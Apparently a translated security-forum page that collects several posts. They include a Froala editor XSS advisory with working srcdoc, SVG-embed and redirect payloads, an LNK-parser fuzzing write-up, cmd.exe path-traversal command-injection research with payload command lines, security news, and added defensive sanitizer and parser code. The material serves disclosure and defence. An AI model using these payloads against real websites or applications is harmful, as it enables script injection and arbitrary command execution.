<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_editor.pkgd.min.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/js/froala_editor.pkgd.min.js"></script>

<div id="froala-editor"></div>

<script>
  let editor = new FroalaEditor('div#froala-editor', {}, function() {
    // This data could be loaded from a potentially untrusted source, e.g. from an API via an XMLHttpRequest
    data = "<s>Hello<\/s><script>console.log(document.domain)<\/script><u>Compass<\/u>";

    // Inserting untrusted data into the editor
    editor.html.set(data);

    // Show how the untrusted data is embedded into the DOM
    console.log(editor.html.get());
  })
</script>

The JavaScript console shows that legit HTML tags like `<s>` or `<u>` were inserted into the DOM but the `<script>` tag was correctly removed (as expected) and therefore the JavaScript was not executed:

<p><s>Hello</s><u>Compass</u></p>

The same can be done by inserting an `<img>` tag with an `onerror` event handler as an XSS vector:

[...]
data = "<s>Hello<\/s><img src=x onerror=console.log(document.domain)><u>Compass<\/u>";
[...]

The JavaScript console again shows that the legit HTML tags were inserted and also the `<img>` tag, but without the used `onerror` event handler. Therefore, the JavaScript was not executed:

<p><s>Hello</s><img src="x" class="fr-fic fr-dii"><u>Compass</u></p>

This shows that it's not possible to load and execute common XSS payloads into the editor.

# XSS Bypass

I tried every event handler from the awesome PortSwigger XSS cheat sheet [4], but all of them were blocked. Thanks to the XSS cheat sheet, I found an HTML tag with an attribute that does not start with `on`, which can execute JavaScript in the origin of the website. This tag was not filtered. It's the `<iframe>` tag with the `srcdoc` attribute.

The `srcdoc` attribute specifies the HTML content of the page to show in the inline frame [5]. This can be used to embed JavaScript code. The code runs in the origin of the website where the iframe is embedded.

Working XSS payload:

[...]
data = "<s>Hello<\/s><iframe srcdoc=\"<img src=x onerror=console.log(document.domain)>\"><\/iframe><u>Compass<\/u>";
[...]

The JavaScript console shows that the `<iframe>` tag with the `srcdoc` attribute was inserted into the DOM without sanitizing. Also the content of the iframe with the `<img>` tag and the `onerror` event handler was not sanitized. Further, the origin on which the PoC website is hosted is printed:

<p><s>Hello</s><iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe><u>Compass</u></p>
poc.example.net

Therefore, this shows that the following XSS payload can be used in order to inject and execute JavaScript into the DOM, which results in a DOM-based XSS:

<iframe srcdoc="<img src=x onerror=console.log(document.domain)>"></iframe>

Note: The `<img>` tag with the `onerror` event handler is only the data content of the `srcdoc` attribute and no code for the browser. This is rendered into code later when the content of the iframe is built.

The injected JavaScript code runs in the origin of the website where the Froala editor is running. The next section explains why I mention this explicitly.

XSS with Undefined / Empty Origin
---------------------------------

There are several issues marked as open and fixed in the Froala GitHub repository regarding XSS [6]. The closed ones are also not fixed at the moment. However, most of these XSS are running in another origin than the website where the editor is loaded.

# Example 1

For example, the issue #3270 [7] that is marked as closed and uses an embedded object (`<embed>` tag) in order to execute JavaScript:

[...]
data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo=\">"
[...]

The base64 decoded payload is an SVG image containing JavaScript:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss">
<script type="text/ecmascript">console.log(document.domain)</script></svg>

The JavaScript console shows that the code is executed but the origin is `undefined`:

<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo="></p>
undefined

# Example 2

Another example is the issue #3039 [8] that is marked as closed and uses the `<object>` tag to embed HTML / JavaScript code:

[...]
data = "<object data='data:text/html,<svg onload=console.log(document.domain)>'>";
[...]

The JavaScript console shows that the code is executed but the origin is empty:

<p><object data="data:text/html,<svg onload=console.log(document.domain)>"></object></p>
// empty line

# Exploiting XSS with Undefined / Empty Origins

Because the origin is not the same as where the PoC is hosted, it's not a typical XSS where an attacker could read the content of the victim's website, use the session to make further requests or access the cookies or web storage.

It is however still possible to perform arbitrary redirects to other websites using the reference to the `window.top.location`:

[...]
data = "<object data='data:text/html,<svg onload=window.top.location=\"http://evil.example.net/\">'>";
[...]

This redirects to http://evil.example.net/.

The same applies for the embed tag:

[...]
data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj4KICA8c2NyaXB0PndpbmRvdy50b3AubG9jYXRpb249Imh0dHA6Ly9ldmlsLmV4YW1wbGUubmV0LyI8L3NjcmlwdD4KPC9zdmc+Cg==\">"
[...]

Decoded base64 payload:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss">
  <script>window.top.location="http://evil.example.net/"</script>
</svg>

This also redirects to http://evil.example.net/.

This is not as nice and powerful as the "real" XSS attack from the beginning, but still something ;-).

Vulnerability Classification
----------------------------

CVSS v3.1 Metrics [9]:

* CVSS Base Score: 6.1
* CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Remediation
-----------

This XSS issue is not fixed. The vendor can't tell any exact release date for a fixed version. Therefore, only trusted data or data that is already sanitized should be loaded into the editor.

# 0day.today [2020-07-05] #
Source
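Every bypass in the advisory above gets past a deny-list: `<script>` is stripped and `on*` handlers are stripped, but `srcdoc` is not an event handler, and `data:` URLs on `<object>` and `<embed>` are never looked at. The remediation calls for sanitizing data before it reaches the editor, so as an added example (my code, built on Python's standard-library html.parser; not Froala's sanitizer) here is an allowlist sanitizer: only named tags and attributes survive, URL attributes must be relative, http or https, and dangerous elements are dropped together with their content. It is run over the advisory's own payloads, so it covers both the srcdoc bypass and the object/embed cases from the "Undefined / Empty Origin" section.

```python
"""Allowlist HTML sanitizer run against the advisory's payloads.
Added example using Python's stdlib html.parser; not Froala's sanitizer."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags that survive, with the attributes each may keep. Everything else is dropped.
ALLOWED_TAGS = {
    "p": set(), "s": set(), "u": set(), "b": set(), "i": set(), "br": set(),
    "a": {"href"},
    "img": {"src", "alt"},
}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https"}   # relative URLs, http and https only
# Disallowed elements whose text content is discarded too, not just the tag.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript", "template"}
VOID_TAGS = {"br", "img"}


def _safe_url(value):
    """Reject javascript:, data:, vbscript: and any other unexpected scheme."""
    try:
        return urlsplit(value.strip()).scheme.lower() in SAFE_SCHEMES
    except ValueError:
        return False


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._suppress = 0   # > 0 while inside an element whose content is dropped

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._suppress += 1
            return
        if self._suppress or tag not in ALLOWED_TAGS:
            return            # unknown tag: drop the tag, keep its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                continue      # onerror, srcdoc, style, ... never get this far
            value = "" if value is None else value
            if name in URL_ATTRS and not _safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._suppress = max(0, self._suppress - 1)
            return
        if self._suppress or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._suppress:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass                  # comments are dropped entirely


def sanitize(untrusted_html):
    """Rebuild the fragment from the parsed token stream."""
    parser = AllowlistSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Payloads from the advisory, plus a javascript: URL in a kept attribute.
    for payload in [
        '<s>Hello</s><script>console.log(document.domain)</script><u>Compass</u>',
        '<s>Hello</s><img src=x onerror=console.log(document.domain)><u>Compass</u>',
        '<s>Hello</s><iframe srcdoc="<img src=x onerror=console.log(document.domain)>"></iframe><u>Compass</u>',
        "<object data='data:text/html,<svg onload=console.log(document.domain)>'>",
        '<a href="javascript:alert(1)">link</a>',
    ]:
        print(sanitize(payload))
```

The design choice is that the sanitizer never has to recognise a bad attribute: `srcdoc` is dropped for the same reason `onerror` is, because `iframe` is not on the list and neither attribute is on any allowed tag's list. Output is rebuilt from the token stream rather than patched with regexes, so quoted `>` characters inside attribute values (the trick the srcdoc payload relies on) are handled by the parser.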
-
Still Bunicu', still on IRC; he was an op on several channels.
-
I met him recently (this year) and he told me he doesn't know whether we'll see each other again; he was depressed (grieving), in case we're talking about the same person.
-
Security researchers detected a new ransomware strain that leveraged piracy as a means of distributing itself to Mac users.

On June 29, a Twitter user reached out to Malwarebytes about a malicious Little Snitch installer that was available for download on a Russian forum known for sharing torrent links. A close look at the installer revealed that it used a generic icon and arrived within a disk image file. Upon activation, this resource loaded the legitimate installer and uninstaller apps for Little Snitch, a program which alerts users when an app attempts to connect to a web server. The program also installed an executable called “patch” in the /Users/Shared directory.

After a script moved it to a location that appeared to relate to Little Snitch and renamed it “CrashReporter” for the purpose of blending in, “patch” removed itself from the /Users/Shared directory, launched its copy and then launched the Little Snitch installer. This process didn’t go so well, however. As Malwarebytes explained in its research:

Further investigation revealed that the threat relied on a malicious installer for DJ software called “Mixed In Key 8.” The malware delivered by that installer was similarly hesitant to get to work, but after Malwarebytes changed the clock setting of its virtual machine, disconnected from the network and restarted the computer a few times, the ransomware finally sprang into action and launched its encryption routine. This process led the threat to encrypt settings files and the keychain files, thus producing error messages and spinning beach balls.

Researchers at the security firm learned from others that the Mac ransomware eventually deployed a ransom note with instructions for payment. Even so, it was unable to replicate this behavior.

[Screenshot of encryption message posted to RUTracker forum (Source: Malwarebytes)]

This isn’t the first time that researchers have detected ransomware targeting Mac users. Back in 2017, for instance, researchers spotted another crypto-malware strain that relied on cracks to pirate commercial software for distribution. As such, organizations should follow these steps to prevent a ransomware infection from occurring in the first place.

Via tripwire.com
-
- 2
-
The patches fix two separate RCE bugs in Windows Codecs that allow hackers to exploit playback of multimedia files.

Microsoft has quietly pushed out two emergency security updates to fix remote code execution bugs in Microsoft Windows Codecs Library. Windows Codecs Library handles how the OS compresses large multimedia files such as photos and videos, and then decodes them for playback within applications.

The out-of-band updates, addressing a critical-severity flaw (CVE-2020-1425) and important-severity vulnerability (CVE-2020-1457), were sent out via Windows Update Tuesday night and affect several versions of Windows 10 and Windows Server 2019. Both vulnerabilities allow for remote code execution “in the way that Microsoft Windows Codecs Library handles objects in memory,” according to the updates. CVE-2020-1425, if exploited, could allow an attacker to execute arbitrary code, while CVE-2020-1457 can be exploited to allow a bad actor to obtain information that would further compromise the user’s system. Both flaws can be exploited if users of affected systems open corrupted media files within applications that use the native Windows Codecs Library.

Microsoft included a complete list of the Windows 10 and Windows Server distributions affected in its advisories, which offered little in terms of specific detail on the flaws. The company did say, however, that there are no mitigations or workarounds for the vulnerabilities. Affected customers need to take no action to receive the update, as they will be automatically updated by Microsoft Store, according to the company. Alternatively, customers who want to receive the update immediately can check for updates with the Microsoft Store App.

Microsoft credited security researcher Abdul-Aziz Hariri for identifying the flaws and reporting them to Trend Micro’s Zero Day Initiative (ZDI), according to a published report in ZDNet.

It’s not completely uncommon for Microsoft to release updates outside of the second Tuesday of every month, also known as “Patch Tuesday.” However, typically the company does so in response to vulnerabilities uncovered by third-party security researchers—including from rivals such as Google — that are found to be under attack. Microsoft said it has not detected either Windows Codecs Library flaw being exploited in the wild.

These patches come weeks after Microsoft’s regularly scheduled June Patch Tuesday, where it released patches for 129 vulnerabilities – the highest number of CVEs ever released by Microsoft in a single month. Within the blockbuster security update, 11 critical remote code-execution flaws were patched in Windows, SharePoint server, Windows Shell, VBScript and other products. Unlike other recent monthly updates from Microsoft, its June updates did not include any zero-day vulnerabilities being actively attacked in the wild.

Via threatpost.com
-
https://wordpress.org/plugins/woo-distance-based-fee/ You take the KM from the dashboard and check, in case the fuel is what's hurting you.
-
Strange, the domain was created in the days before. Creation Date: 2020-06-15T11:27:45Z On the same Monday.
-
The Shell Link Binary File Format contains information that can be used to access another data object. The Shell Link Binary File Format is the format of Windows files with the extension "LNK"; we call it a shortcut file. The structure of this format is very complicated; Microsoft has provided a document about the LNK file format for reference[1].

I've followed the Microsoft patches for a long time. In 2018, I found that they had 2 LNK bugs which were fixed and all of them were RCE. Recently, @Lays found a bunch of LNK file parsing bugs, so I think this binary file format is suitable for fuzzing. However, you need to reverse and learn how Windows handles this LNK file.

Introduction

File Explorer, previously known as Windows Explorer, is a file manager application that has been included with releases of the Microsoft Windows operating system from Windows 95 onwards. It provides a graphical user interface for accessing the file systems. It is also the component of the operating system that presents many user interface items on the screen such as the taskbar and desktop. Explorer has a lot of features, and Microsoft has upgraded it with each version of the operating system. Here I discovered that Explorer will automatically parse an LNK file if the LNK file appears in the context that Explorer is accessing. For example, if we are on the desktop, Explorer will parse the LNK files that appear on the desktop and maybe in some secondary directory (about the depth of the folder that Explorer can access, I don't know).

Introduce parsing LNK file in Explorer

How can we build an arsenal to fuzz this LNK file format? We need to rely on Explorer and debug it. Use Windbg to attach to the explorer.exe process: I put breakpoints at 2 functions, CreateFileA and CreateFileW; I guess that Explorer will use them to read the file before parsing.

After a few breaks on the CreateFileW function, I saw Explorer calling the CreateFileW function with the file "Process Hacker 2.lnk"; this LNK file is on the desktop. I viewed the call stack at this breakpoint: We can see that a series of APIs related to CShellLink are called in windows.storage.dll. Here I returned to MSDN to learn about these CShellLink related APIs and I found this[2]: It is possible to create an LNK parsing program using the IShellLink interface. Based on what MSDN provides, I use IPersistFile to load and parse LNK files; this is the harness I use for fuzzing. I debugged the test with the harness that I built on the file "test_debug.lnk". Comparing the call stack between my harness and Explorer, they look quite similar. I decided to use this harness for fuzzing.

Fuzzing LNK

A corpus for this LNK file is also quite available on GitHub repos. I found and downloaded them, then used them to fuzz. With the familiar winafl[3] and DynamoRIO[4], I used it with coverage_module windows.storage.dll. I ran fuzzing with 1 master and 7 slaves. About fuzzing and coverage, you can read my blogs before[5][6]. After some time running fuzzing, I went back to check my crashes and I found 4 unique crashes:

- Out of bound read in windows_storage!CRegFolder::_AttributesOf
- Out of bound read in windows_storage!CRegFolder::_CreateCachedRegFolder
- Out of bound read in shell32!CControlPanelCategoryFolder::_IsValidCategoryPidl
- Double free in windows_storage!DSA_DestroyCallback

I checked these 4 crashes on Explorer; only the double-free bug can cause explorer.exe to crash, the 3 out of bound read bugs do not cause explorer.exe to crash. I reported all 4 bugs to Microsoft. Microsoft only accepted my double-free bug; they rejected the rest because the crash did not occur on the default configuration of the system and could not be exploited (regarding the default configuration of the system, I think this is because the harness I use is not as complete as Explorer when parsing 1 LNK file).

CVE-2020-1299

The double-free bug I found above was fixed in this June patch of Microsoft. Here is a bit of the cause of this bug. We have struct DSA as follows:

DSA object:

    struct DSA {
        INT nItemCount;
        LPVOID pData;
        INT nMaxCount;
        INT nItemSize;
        INT nGrow;
    };

The DSA object[7] is initialized at DSA_Create[8] and items are inserted with DSA_InsertItem[9]. While inserting additional items, it will allocate a memory area for the pData field in struct DSA. When releasing the DSA object, the program called the DSA_DestroyCallback function twice to release the same DSA object. The function s_DestroyCacheItemCB has an error: when freeing the pData field, it did not check the availability of this memory, resulting in a double-free bug. The pData memory had been freed before; I don't analyze further why the DSA object was destroyed twice due to some condition in the previous thread. For this bug, we can use-after-free on the DSA object to trigger RCE.

Conclusion

Above is the whole process I researched to find an attack surface for the LNK file and apply fuzzing to find faults in the LNK parsing process. At the time I found this bug, I only targeted the windows.storage.dll DLL without knowing that LNK had another type: LNK search (after ZDI published a blog which analyzed a bug of @Lays, I realized this format)[10]. In addition to windows.storage.dll used to parse LNK files, there are also windows.storage.search.dll and StructuredQuery.dll. In the following blog I will talk about some bugs I found in StructuredQuery.dll which Microsoft does not fix although they may cause a temporary DoS. Microsoft suggests that I can blog about those bugs and they are confident that they can answer every customer's questions about bugs they don't fix.

References:
[1] https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/16cb4ca1-9339-4d0c-a68d-bf1d6cc0f943
[2] https://docs.microsoft.com/en-us/windows/win32/shell/links
[3] https://github.com/googleprojectzero/winafl
[4] https://github.com/DynamoRIO/dynamorio
[5] https://ezqelusia.blogspot.com/2020/05/start-fuzzing-fuzz-various-image-viewers.html
[6] https://ezqelusia.blogspot.com/2020/05/microsofts-first-bug.html
[7] https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/
[8] https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create
[9] https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem
[10] https://www.zerodayinitiative.com/blog/2020/3/25/cve-2020-0729-remote-code-execution-through-lnk-files

Researcher: linhlhq from Infiniti Team - VinCSS (a member of Vingroup).
Source
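The post's harness hands the file to the Windows IShellLink/IPersistFile APIs; the out-of-bound reads it found are what a parser gets when it trusts the length fields. As an added example (not the post's code), here is a bounds-checked reader for the ShellLinkHeader, LinkTargetIDList and StringData structures from the MS-SHLLINK document cited above, in Python so it runs anywhere; the sample shortcut bytes are constructed inline, and the field names and layout follow the specification.

```python
import struct
from dataclasses import dataclass, field

HEADER_SIZE = 0x4C
HEADER_FMT = "<I16sIIQQQIiIHHII"   # the 76-byte ShellLinkHeader, fields in spec order
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46} on disk
# LinkFlags bits from MS-SHLLINK 2.1.1 (only the ones this parser acts on)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 1, 2, 4, 8
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 16, 32, 64, 128
STRING_DATA_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location"))


class LnkError(ValueError):
    """Raised on any structural problem instead of reading past the buffer."""


@dataclass
class ShellLink:
    link_flags: int
    file_attributes: int
    file_size: int
    show_command: int
    item_ids: list = field(default_factory=list)  # raw ItemID payloads, in order
    strings: dict = field(default_factory=dict)   # StringData fields by name


class Reader:
    """Cursor over the file; every read is bounds-checked before it happens."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        if n < 0 or self.pos + n > len(self.data):
            raise LnkError(f"truncated: need {n} bytes at offset {self.pos}")
        chunk, self.pos = self.data[self.pos:self.pos + n], self.pos + n
        return chunk

    def unpack(self, fmt: str) -> tuple:
        return struct.unpack(fmt, self.take(struct.calcsize(fmt)))


def parse_lnk(data: bytes) -> ShellLink:
    r = Reader(data)
    hdr_size, clsid, flags, attrs, _ct, _at, _wt, size, _icon, show, *_rsv = r.unpack(HEADER_FMT)
    if hdr_size != HEADER_SIZE:
        raise LnkError("HeaderSize is not 0x4C")
    if clsid != LINK_CLSID:
        raise LnkError("LinkCLSID mismatch")
    link = ShellLink(flags, attrs, size, show)
    if flags & HAS_LINK_TARGET_ID_LIST:
        idlist_size = r.unpack("<H")[0]   # counts the bytes that follow the size field
        end = r.pos + idlist_size
        while True:
            item_size = r.unpack("<H")[0]
            if item_size == 0:            # TerminalID closes the list
                break
            if item_size < 2 or r.pos + item_size - 2 > end:
                raise LnkError("ItemID overruns its IDList")
            link.item_ids.append(r.take(item_size - 2))
        if r.pos != end:
            raise LnkError("IDListSize disagrees with the ItemIDs it contains")
    if flags & HAS_LINK_INFO:
        info_size = r.unpack("<I")[0]     # LinkInfoSize includes the size field itself
        if info_size < 4:
            raise LnkError("LinkInfoSize too small")
        r.take(info_size - 4)             # skipped by declared size; not decoded here
    for flag, name in STRING_DATA_FIELDS:
        if flags & flag:
            count = r.unpack("<H")[0]     # CountCharacters; no terminator follows
            raw = r.take(count * 2 if flags & IS_UNICODE else count)
            codec = "utf-16-le" if flags & IS_UNICODE else "cp1252"
            link.strings[name] = raw.decode(codec, errors="replace")
    return link


def validate(data: bytes) -> str:
    """Triage helper: 'ok', or the reason the file was rejected."""
    try:
        parse_lnk(data)
        return "ok"
    except LnkError as exc:
        return str(exc)


def build_sample_lnk(name: str, arguments: str, item_ids: list) -> bytes:
    """Constructed sample for testing, not a shortcut taken from a Windows system."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_NAME | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(HEADER_FMT, HEADER_SIZE, LINK_CLSID, flags,
                         0x20, 0, 0, 0, 1234, 0, 1, 0, 0, 0, 0)
    items = b"".join(struct.pack("<H", len(i) + 2) + i for i in item_ids) + b"\x00\x00"
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (name, arguments))
    return header + struct.pack("<H", len(items)) + items + strings


SAMPLE_LNK = build_sample_lnk("Demo link", "/c echo hi", [b"\x1f\x50", b"\x2f\x43\x3a\x5c"])
```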
-
- 3
-
And how do you drink beer with a muzzle on your mug? Around when?
-
He's referring to this https://hackaday.com/2017/07/29/injecting-code-into-mouse-firmware-should-be-your-next-hack/ Back up and mount the partitions in a VM, mouse and all, man.
-
Ideally (I repeat), you don't wipe everything: you make a backup, re-install (off-line), run the partitions in a VM, scan (off-line), pull everything that is a sample out into quarantine, post it in the Technical Section; maybe someone has time for a 0day too.
-
Backup, rootkit scan, re-install. By the way, which Operating System are you using?
-
Hi, does anyone know whether pagers (Semafoon) with coverage on Romanian territory (Orange, Vodafone... etc.) still exist? What I found are smart watches. Thanks
-
This one is about an interesting behavior I identified in cmd.exe as a result of many weeks of intermittent (private time, every now and then) research in pursuit of some new OS Command Injection attack vectors. So I was mostly trying to:

- find an encoding mismatch between some command check/sanitization code and the rest of the program, allowing to smuggle the ASCII version of the existing command separators in the second byte of a wide char (for a moment I believed I had it in the StripQuotes function - I was wrong ¯\(ツ)/¯),
- discover some hidden cmd.exe counterpart of the unix shells' backtick operator,
- find a command separator alternative to |, & and \n - which long ago resulted in the discovery of an interesting and still alive, but very rarely occurring vulnerability - https://vuldb.com/?id.93602.

And I eventually ended up finding a command/argument confusion with path traversal ... or whatever the fuck this is.

For the lazy with no patience to read the whole thing, here comes the magic trick:

Tested on Windows 10 Pro x64 (Microsoft Windows [Version 10.0.18363.836]), cmd.exe version: 10.0.18362.449 (SHA256: FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5). But it should work with earlier versions as well... probably with all versions.

Some more context

Let's consider the following command line: cmd.exe /c "ping 127.0.0.1", where 127.0.0.1 is the argument controlled by the user in an application that runs an external command (in this sample case it's ping). This exact syntax - with the command being preceded with the /c switch and enclosed in double quotes - is the default way cmd.exe is used by external programs to execute system commands (e.g. the PHP shell_exec() function and its variants).

Now, the user can trick cmd.exe into running calc.exe instead of ping.exe by providing an argument like 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe, traversing the path to the executable of their choice, which cmd.exe will run instead of the ping.exe binary. So the full command line becomes:

cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"

The potential impact of this includes Denial of Service, Information Disclosure and Arbitrary Code Execution (depending on the target application and system). Although I am fairly sure there are some other scenarios with OS command execution where a part of the command line comes from a different security context than the one the final command is executed with (some services maybe? I haven't searched myself yet) - anyway, let's use a web application as an example. Consider the following sample PHP code:

Due to the use of escapeshellcmd() it is not vulnerable to known command injection vectors (except for argument injection, but that's a slightly different story and does not allow RCE with the list of arguments ping.exe supports - no built-in execution arguments like find's -exec). And I know, I know, some of you will point out that in this case escapeshellarg() should be used instead - and yup, you would be right, especially since putting the argument in quotes in fact prevents this behavior, as in such a case cmd.exe properly identifies the command to run (ping.exe). The trick does not work when the argument is enclosed in single/double quotes. Anyway - the use of escapeshellcmd() instead of escapeshellarg() is very common. I noticed that while - after finding and registering CVE-2020-12669, CVE-2020-12742 and CVE-2020-12743 - I ended up spending one more week running automated source code analysis scans against more open source projects and manually following up the results, using my old evil SCA tool for PHP.

Also, that's what made me fed up with PHP again quite quickly, forcing me to get back to cmd.exe, only to let me finally discover what this blog post is mostly about. I am fairly sure there are applications vulnerable to this (doing OS command injection sanity checks, but failing to prevent path traversal and enclose the argument in quotes). I haven't searched yet because I am way too lazy/busy. Also, the notion of similar behavior in other command interpreters is worth entertaining.

An extended POC

Normal use:

Abuse:

Now, this is what normal use looks like in the Sysmon log (process creation event):

So basically the child process (ping.exe) is created with a command line equal to the value enclosed between the double quotes preceded by the /c switch from the parent process (cmd.exe) command line. Now, the same for the above ipconfig.exe hijack:

And it turns out we are not limited to executables located in directories present in %PATH%. We can traverse to any location on the same disk. Also, we are not limited to the EXE extension, nor to the list of "executable" extensions contained in the %PATHEXT% variable (which by default is .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC - basically these are the extensions cmd.exe will try to add to the name of the command if no extension is provided, e.g. when ping is used instead of the explicit ping.exe). cmd.exe runs stuff regardless of the extension, something I noticed long ago (https://twitter.com/julianpentest/status/1203386223227572224). And one more thing - more additional arguments between the original command and the smuggled executable path can be added. Let's see all of this combined. For demonstration purposes, the following C program was compiled and linked into a PE executable (it simply prints out its own command line):

I copied the EXE into C:\xampp\tmp\cmd.png (consider this as an example of ANY location a malicious user could write a file to).

Action:

So we just effectively achieved an equivalent of actual (exec, not just read) PE Local File Inclusion in an otherwise-safe PHP ping script. But I don't think that our options end here.

The potential for extending this into a full RCE without chaining with file upload/control

I am certain it is also possible to turn this into an RCE even without the possibility of fully/partially controlling any file in the target file system, and deliver the payload in the command line itself, thus creating a sort of polymorphic malicious command line payload. When running the target executable, cmd.exe passes to it the entire part of the command line following the /c switch. For instance:

cmd.exe /c "ping 127.0.0.1/../../../../../../../windows/system32/calc.exe"

executes c:\windows\system32\calc.exe with a command line equal to ping 127.0.0.1/../../../../../../../windows/system32/calc.exe. And, as presented in the extended POC, it is possible to hijack the executable even when providing multiple arguments, leading to command lines like:

ping THE PLACE FOR THE RCE PAYLOAD ARGS 127.0.0.1/../../path/to/lol.bin

This is the command line lol.bin would be executed with. Finding a proxy execution LOLBin tolerant enough of invalid arguments (since we as attackers cannot fully control them) could turn this into a full RCE. The LOLBin we need is one accepting/ignoring the first argument (which is the hardcoded command we cannot control, in our example "ping"), while also willing to accept/ignore the last one (which is the traversed path to itself). Something like https://lolbas-project.github.io/lolbas/Binaries/Ieexec/, but actually accepting multiple arguments while quietly ignoring the incorrect ones. Also, I was thinking of powershell.

Running this:

cmd.exe /c "ping ;calc.exe; 127.0.0.1/../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE"

makes powershell start with a command line of ping ;calc.exe 127.0.0.1/../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/POWERSHELL.EXE

I expected it to treat the command line as a string of inline commands and run calc.exe after running ping.exe. Yes, I know, a semicolon is used here to separate ping from calc - but the semicolon character is NOT a command separator in cmd.exe, while it is in powershell (on the other hand almost all OS Command Injection filters block it anyway, as they are written universally with multiple platforms in mind - cause obviously the semicolon IS a command separator in unix shells). A perfectly supported syntax here would be some sort of simple base64-encoded code injection like powershell's -EncodedCommand, having found a way to make it work even when preceded with a string we cannot control. Anyway, this attempt led to powershell running in interactive mode instead of treating the command line as a sequence of inline commands to execute. Anyway, at this point turning this into an RCE boils down to researching the behaviors of particular LOLbins, focusing on the way they process their command line, rather than researching cmd.exe itself (although yes, I also thought about self-chaining and abusing cmd.exe as the LOLbin for this, in hope of taking advantage of some nuances between the way it parses its command line when it does and when it does not start with the /c switch).

Stumbling upon and some analysis

